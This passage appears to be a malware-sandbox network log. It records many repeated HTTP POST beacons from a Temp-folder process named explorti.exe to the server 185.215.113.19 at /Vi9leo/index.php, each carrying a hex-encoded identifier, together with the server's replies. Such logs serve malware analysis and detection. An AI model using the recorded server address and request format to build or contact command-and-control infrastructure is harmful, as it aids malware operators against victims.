Jul 27, 2024 06:34:10.651735067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:10.652134895 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:10.652352095 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:10.852658033 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:11.098033905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	62238	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:11.222361088 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:11.961165905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:11.961966991 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:12.206079006 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	62239	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:12.319660902 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:13.073952913 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:13.074616909 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:13.321502924 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	62240	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:13.438275099 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:14.181307077 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:14.181981087 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:14.428961039 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	62241	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:14.547416925 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:15.347615957 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:15.348408937 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:15.611372948 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	62242	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:15.718961954 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:16.454680920 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:16.455404997 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:16.698694944 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	62243	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:16.814343929 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:17.697936058 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:17.699001074 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:17.946119070 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	62244	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:18.063286066 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:18.897834063 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:18.898705006 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:19.146126032 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	62245	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:19.266891956 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:20.014185905 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:19 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:20.014864922 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:20.261534929 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	62246	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:20.375211954 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:21.124422073 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:21.127307892 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:21.374568939 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:21 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	62247	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:21.485002995 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:22.666358948 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:22.666496038 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:22.666990042 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:22.931921959 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	62248	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:23.051628113 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:23.827049017 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 27, 2024 06:34:23.827734947 CEST	306	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 31 32 37 37 37 42 35 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7FB12777B55E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Jul 27, 2024 06:34:24.079806089 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	62249	185.215.113.19	80	7956	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 27, 2024 06:34:24.187935114 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 27, 2024 06:34:24.938921928 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 27 Jul 2024 04:34:24 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
